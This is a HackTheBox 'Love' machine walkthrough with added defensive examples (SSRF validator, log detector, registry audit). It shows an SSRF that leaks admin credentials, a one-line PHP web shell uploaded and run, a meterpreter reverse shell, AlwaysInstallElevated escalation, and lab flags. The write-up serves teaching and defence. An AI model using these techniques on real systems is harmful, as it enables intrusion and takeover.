HackTheBox: Love Machine Solution


Haven’t done any HackTheBox in a while so I decided to jump back into it with an easy machine. Hope to have a medium solution posted in the near future. Love recently retired so let’s get into it :)


0x00 Recon

Starting off with some basic recon, we have a few open ports to look at:

Nmap scan report for 10.10.10.239
Host is up (0.016s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after:  2022-01-18T14:00:16
| MD5:   bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   JavaRMI: 
|_    Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after:  2024-04-10T14:39:19
| MD5:   d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-07-31T21:10:28+00:00; +23m35s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC

Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

The nmap scan revealed some domains to us; let’s add those to our /etc/hosts file so they’ll resolve:

  • www.love.htb
  • staging.love.htb

Wfuzz also revealed an /admin endpoint on the root domain:

Target: http://love.htb/FUZZ
Total requests: 4697

===================================================================
ID           Response   Lines    Word     Chars       Payload                      
===================================================================
...SNIP...                   
000000511:   301        9 L      30 W     337 Ch      "admin"                      
000002181:   200        125 L    324 W    4388 Ch     "index.php"                  
000001696:   503        11 L     44 W     402 Ch      "examples"                   

Furthermore, we have 3 separate web services running on this box:

  • Admin panel on root domain
  • File scanner on staging subdomain
  • Unknown resource we cannot access on port 5000 (??)

Accessing the root domain, we’re greeted with a login panel for which we don’t have the creds just yet.

After trying some basic SQLi auth bypass tricks on the root domain, I determined that wasn’t quite the path forward and decided to check out the staging subdomain instead.

This particular service was kind enough to provide some functionality without needing any creds :). After exploring the /beta endpoint, the first thing that comes to mind is SSRF. Any time a service fetches an external web resource on your behalf, SSRF is a risk and should be checked for.

I spent far too much time giving this thing URLs before remembering it’s common to bind to ALL interfaces 😉. Remember to keep things simple! Supplying http://localhost:5000/ vs http://10.10.10.239:5000/ gives very different results, and we end up retrieving some creds: admin:@LoveIsInTheAir!!!!
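The port 5000 service is unreachable from the outside but happily served to the scanner on the same host, which is exactly the failure mode a server-side fetcher has to defend against. The following is an added example, not code from the original post or from the voting application, of the destination check such a scanner should run before fetching a user-supplied URL. It resolves the hostname first, so aliases of the loopback address are caught, and accepts only public, globally routable addresses. The resolver is injectable and the DEMO_DNS table is constructed, so the example runs offline; the hostnames in it are taken from this page.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def dns_resolve(host):
    """Default resolver: every address the OS resolver returns (needs network)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_target(url, resolver=dns_resolve):
    """Return (ok, reason) for a URL a server-side fetcher has been asked to retrieve.

    A destination is accepted only when every address it resolves to is a public,
    globally routable unicast address. Loopback, link-local, RFC 1918, 0.0.0.0/8,
    IPv4-mapped IPv6 and multicast are all refused, so 'localhost', '127.0.0.1',
    '[::1]' and '[::ffff:127.0.0.1]' cannot be used to reach a localhost-only service.
    `resolver` is injectable so the check can be exercised without DNS.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        # IP literals need no lookup; hostnames are resolved to every record,
        # because a name can mix public and internal addresses.
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            addrs = resolver(host)
        except (socket.gaierror, UnicodeError):
            return False, f"cannot resolve {host!r}"
    if not addrs:
        return False, f"{host!r} resolved to nothing"
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped  # judge ::ffff:a.b.c.d by its IPv4 payload
        if ip.is_multicast or not ip.is_global:
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, "ok"


# Constructed lookup table standing in for DNS so the example runs offline.
DEMO_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "staging.love.htb": ["10.10.10.239"],
    "example.com": ["93.184.216.34"],
}


def demo_resolver(host):
    if host not in DEMO_DNS:
        raise socket.gaierror(f"no such host: {host}")
    return DEMO_DNS[host]


if __name__ == "__main__":
    for candidate in ("http://localhost:5000/", "http://10.10.10.239:5000/",
                      "http://[::ffff:127.0.0.1]:5000/", "file:///C:/xampp/htdocs/",
                      "http://example.com/"):
        print(candidate, "->", is_safe_target(candidate, resolver=demo_resolver))
```

Resolving before checking matters because the application otherwise compares strings, and "localhost", "127.1", a DNS name pointing at 127.0.0.1, or an IPv4-mapped IPv6 literal all slip past a blocklist of the obvious spellings. The check is also deliberately strict about RFC 1918 space, which means that in a lab network like the one here every target is refused; in production that is the behaviour you want. A resolve-then-fetch design still leaves a DNS rebinding window, so the fetcher should connect to the vetted address rather than re-resolving the name.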

0x01 Admin Panel Access

The creds found above work on the admin panel located at http://love.htb/admin. The admin of the voting system appears to be “Neovic Devierte”. Attempting to access the “print” functionality gives us a full path disclosure:

Warning: “continue” targeting switch is equivalent to “break”. Did you mean to use “continue 2”? in C:\xampp\htdocs\omrs\tcpdf\tcpdf.php on line 17778 TCPDF ERROR: Some data has already been output, can’t send PDF file

Knowing we have the SSRF from earlier, I decided to check out what’s in the tcpdf.php file. Nothing useful. I kept exploring the admin dashboard, which led to the photo upload functionality. It happily accepted a custom PHP shell, which ended up at images/shell.php.

Shell source:

<?php $x = system($_GET['x']); ?>

0x02 Foothold

Our basic PHP shell lets us execute system commands, so let’s find out who we are!

GET /images/shell.php?x=whoami HTTP/1.1
Host: www.love.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://www.love.htb/admin/voters.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=hfi9rkokgavfkglrb7doti96ef
Connection: close

HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 21:50:11 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

love\phoebe
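The upload and the request above leave a clear trace in the Apache access log: a .php file being served from a directory that should only hold images, with a command name in the query string. The following is an added example, not part of the original post, of a small detector a defender could run over such logs. The regular expression covers the common and combined log formats; the upload directories, the keyword list and the SAMPLE_LOG lines are constructed for the example, modelled on the paths that appear on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Prefix shared by Apache "common" and "combined" log formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve uploaded images. Assumed layout, based
# on the images/shell.php path on this page; adjust to the application.
UPLOAD_DIRS = ("/images/", "/admin/images/")
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Words that rarely belong in a legitimate query-string value.
SHELL_WORDS = re.compile(
    r"\b(whoami|cmd(?:\.exe)?|powershell|net user|certutil|ipconfig|systeminfo)\b", re.I)


def classify(line):
    """Return a list of alert reasons for one access-log line (empty = nothing seen)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    parts = urlsplit(m["target"])
    path = parts.path
    reasons = []
    # Rule 1: server-side script executed from an upload-only directory.
    if path.startswith(UPLOAD_DIRS) and EXECUTABLE_EXT.search(path):
        reasons.append(f"script executed from upload dir: {path} -> {m['status']}")
    # Rule 2: command-like content in any query parameter.
    for key, values in parse_qs(parts.query).items():
        for v in values:
            if SHELL_WORDS.search(v):
                reasons.append(f"command-like value in parameter {key!r}: {v!r}")
    return reasons


def scan(lines):
    """Return [(line_number, reasons)] for every line that raised at least one alert."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample log lines modelled on the request shown above; the timestamps,
# sizes and the benign entries are made up.
SAMPLE_LOG = """\
10.10.14.7 - - [31/Jul/2021:21:49:40 +0000] "POST /admin/voters.php HTTP/1.1" 302 -
10.10.14.7 - - [31/Jul/2021:21:49:41 +0000] "GET /images/profile.jpg HTTP/1.1" 200 18402
10.10.14.7 - - [31/Jul/2021:21:50:11 +0000] "GET /images/shell.php?x=whoami HTTP/1.1" 200 13
10.10.14.7 - - [31/Jul/2021:21:51:02 +0000] "GET /images/shell.php?x=dir%20C%3A%5Cxampp HTTP/1.1" 200 1203
10.10.14.7 - - [31/Jul/2021:21:52:30 +0000] "GET /index.php HTTP/1.1" 200 4388
""".splitlines()

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

Rule 1 is the one worth keeping even if the keyword list is noisy: a 200 for any PHP file under an upload directory means the server both accepted a script as an "image" and is configured to execute it. The corresponding fix on the application side is to validate uploads by content and extension and to disable script execution in the upload directory, for instance with a `php_flag engine off` directive or a `<FilesMatch>` deny rule in that directory's Apache configuration.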

I decided I hated executing commands via HTTP, so I threw a quick meterpreter payload (abusing the same upload functionality) and spawned a real reverse shell:

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x86/windows  LOVE\Phoebe @ LOVE  10.10.14.7:4444 -> 10.10.10.239:54399 (10.10.10.239)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

0x03 Flags

User

Grabbing user was as simple as reading the Desktop for user.txt.

Flag spoiler! user.txt : 44412c39d7d79abf83eff963d7500e83

Root

Uploading the WinPEAS enum script (think LinEnum for Windows) and running it on the target revealed some interesting things. The one that stood out the most, and something I was unaware of when it comes to Windows exploitation, is the AlwaysInstallElevated registry key:

  • https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

Metasploit makes quick work of this configuration oversight: use exploit/windows/local/always_install_elevated.

Pass it the unpriv meterpreter session and voilà!
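What WinPEAS flagged here is a policy, not a bug, and it is only dangerous when it is set in both hives: Windows Installer runs a package as SYSTEM only if AlwaysInstallElevated is 1 under both HKLM and HKCU. The following is an added example, not part of the original post or of WinPEAS, of an audit that reads the output of `reg query` for both keys, states whether the combination is exploitable, and prints the commands to clear it. The VULNERABLE_* and MISSING strings are constructed reg.exe output so the example runs offline; `live_assess` performs the real queries on a Windows host.

```python
import re
import subprocess

# The two policy locations Windows Installer consults. Elevated installs for
# everyone happen only when BOTH values are 1; a single hive set is inert.
INSTALLER_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.M)


def parse_value(reg_output):
    """Extract the DWORD from `reg query <key> /v AlwaysInstallElevated` text,
    or None when reg reported the key or value as missing."""
    m = VALUE_RE.search(reg_output)
    return int(m.group(1), 16) if m else None


def assess(hklm_output, hkcu_output):
    """Combine both hives into a single verdict."""
    hklm, hkcu = parse_value(hklm_output), parse_value(hkcu_output)
    exploitable = hklm == 1 and hkcu == 1
    if exploitable:
        verdict = "CRITICAL: enabled in both hives; any local user can run an MSI as SYSTEM"
    elif hklm == 1 or hkcu == 1:
        verdict = "WARN: enabled in one hive only; not exploitable alone, but should be cleared"
    else:
        verdict = "OK: AlwaysInstallElevated is not enabled"
    return {"hklm": hklm, "hkcu": hkcu, "exploitable": exploitable, "verdict": verdict}


def remediation_commands():
    """Commands an administrator runs to clear the policy in both hives."""
    return [f"reg add {key} /v AlwaysInstallElevated /t REG_DWORD /d 0 /f"
            for key in INSTALLER_KEYS.values()]


def live_assess():
    """Query the real registry on a Windows host (not used by the offline demo)."""
    outputs = []
    for key in INSTALLER_KEYS.values():
        proc = subprocess.run(["reg", "query", key, "/v", "AlwaysInstallElevated"],
                              capture_output=True, text=True)
        outputs.append(proc.stdout + proc.stderr)  # reg prints "not found" to stderr
    return assess(*outputs)


# Constructed reg.exe output modelled on a misconfigured host and on a clean one.
VULNERABLE_HKLM = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
VULNERABLE_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    result = assess(VULNERABLE_HKLM, VULNERABLE_HKCU)
    print(result["verdict"])
    if result["exploitable"]:
        print("\n".join(remediation_commands()))
```

Clearing the values locally is the quick fix; the durable one is the Group Policy setting that writes them, "Always install with elevated privileges" under Windows Components > Windows Installer, which exists in both the Computer and User configuration trees and has to be Disabled or Not Configured in both for the registry values to stay gone after the next policy refresh.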

Flag spoiler! root : e6cc8c65105f3cc328a5243d382e7fef
